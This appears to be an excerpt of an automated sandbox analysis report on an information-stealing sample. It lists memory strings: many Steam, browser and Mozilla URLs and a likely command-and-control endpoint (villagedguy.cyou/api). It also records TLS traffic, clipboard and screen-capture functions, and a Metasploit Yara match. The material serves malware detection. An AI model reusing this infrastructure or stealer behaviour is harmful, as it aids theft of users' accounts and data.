              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: BitLockerToGo.exe, 00000002.00000003.1924301094.0000000005090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000002.00000003.1924301094.000000000508E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: BitLockerToGo.exe, 00000002.00000003.1924301094.000000000508E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/
              Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/Y
              Source: BitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2022709028.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1981900349.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010643755.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1996190492.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1922685655.0000000002CBA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2023090021.0000000002CBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2032771167.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2033135323.0000000002CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api
              Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api0
              Source: BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apiF9
              Source: BitLockerToGo.exe, 00000002.00000003.2009812823.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010533759.0000000002D1C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010643755.0000000002D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apiO
              Source: BitLockerToGo.exe, 00000002.00000003.2023090021.0000000002CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apiX
              Source: BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2032771167.0000000002D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apibu
              Source: BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apibu0
              Source: BitLockerToGo.exe, 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apig
              Source: BitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apiob
              Source: BitLockerToGo.exe, 00000002.00000003.1996190492.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apis
              Source: BitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api~Vl
              Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/ges
              Source: BitLockerToGo.exe, 00000002.00000003.2033135323.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2029618149.0000000002CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/h
              Source: BitLockerToGo.exe, 00000002.00000003.1998002889.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1996190492.0000000002D2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou:443/api
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: https://www.digicert.com/CPS0
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: libidn2-0.dll.0.drString found in binary or memory: https://www.gnu.org/gethelp/
              Source: libidn2-0.dll.0.drString found in binary or memory: https://www.gnu.org/gethelp/exebatcmdcom
              Source: libiconv-2.dll.0.drString found in binary or memory: https://www.gnu.org/licenses/
              Source: libidn2-0.dll.0.drString found in binary or memory: https://www.gnu.org/software/libidn/#libidn2
              Source: libidn2-0.dll.0.drString found in binary or memory: https://www.gnu.org/software/libidn/#libidn2Libidn2General
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: VBoxProxyStub-x86.dll.0.drString found in binary or memory: https://www.virtualbox.org/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00438A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00438A30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00438A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00438A30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00438BF0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00438BF0

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000001.00000002.1881484672.000000000A7D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECF400C0_2_00007FF70ECF400C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECDA8AC0_2_00007FF70ECDA8AC
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECE569C0_2_00007FF70ECE569C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECEECE00_2_00007FF70ECEECE0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECDDC4C0_2_00007FF70ECDDC4C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECF09D80_2_00007FF70ECF09D8
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECE62940_2_00007FF70ECE6294
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ED090080_2_00007FF70ED09008
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ED02F240_2_00007FF70ED02F24
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECFC0740_2_00007FF70ECFC074
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECFBDF80_2_00007FF70ECFBDF8
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECFFD180_2_00007FF70ECFFD18
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECDBF0C0_2_00007FF70ECDBF0C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECDB3180_2_00007FF70ECDB318
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ED055100_2_00007FF70ED05510
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ED059E00_2_00007FF70ED059E0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECF400C0_2_00007FF70ECF400C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECDE91C0_2_00007FF70ECDE91C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECDB9480_2_00007FF70ECDB948
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECD72AC0_2_00007FF70ECD72AC
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECECA300_2_00007FF70ECECA30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D0202_2_0042D020
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004321CC2_2_004321CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004412F02_2_004412F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040E2802_2_0040E280
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043D5302_2_0043D530
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040F6E02_2_0040F6E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004117892_2_00411789
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004488A02_2_004488A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043DAF22_2_0043DAF2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00431C502_2_00431C50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040FDCC2_2_0040FDCC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043DE1A2_2_0043DE1A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00447F402_2_00447F40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004420402_2_00442040
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004300682_2_00430068
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004010002_2_00401000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004080202_2_00408020
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004461C02_2_004461C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040A1EE2_2_0040A1EE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043E1802_2_0043E180
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043C1B12_2_0043C1B1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004072702_2_00407270
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004482302_2_00448230
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004202C12_2_004202C1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004012D52_2_004012D5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004302802_2_00430280
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041D2AD2_2_0041D2AD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042E3432_2_0042E343
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004293D02_2_004293D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041F3882_2_0041F388
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D4202_2_0042D420
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040B4E02_2_0040B4E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004264BD2_2_004264BD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040C5602_2_0040C560
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004485602_2_00448560
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004055002_2_00405500
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043E5C02_2_0043E5C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C5A02_2_0042C5A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004385A02_2_004385A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042F6622_2_0042F662
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004096022_2_00409602
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004076202_2_00407620
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D6212_2_0042D621
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004466F02_2_004466F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004247C02_2_004247C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040E7802_2_0040E780
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040A8F02_2_0040A8F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004168922_2_00416892
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004459502_2_00445950
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004039602_2_00403960
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042E9BD2_2_0042E9BD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040BA502_2_0040BA50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00429A2F2_2_00429A2F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004117892_2_00411789
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436A802_2_00436A80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00446AA02_2_00446AA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00421AB02_2_00421AB0
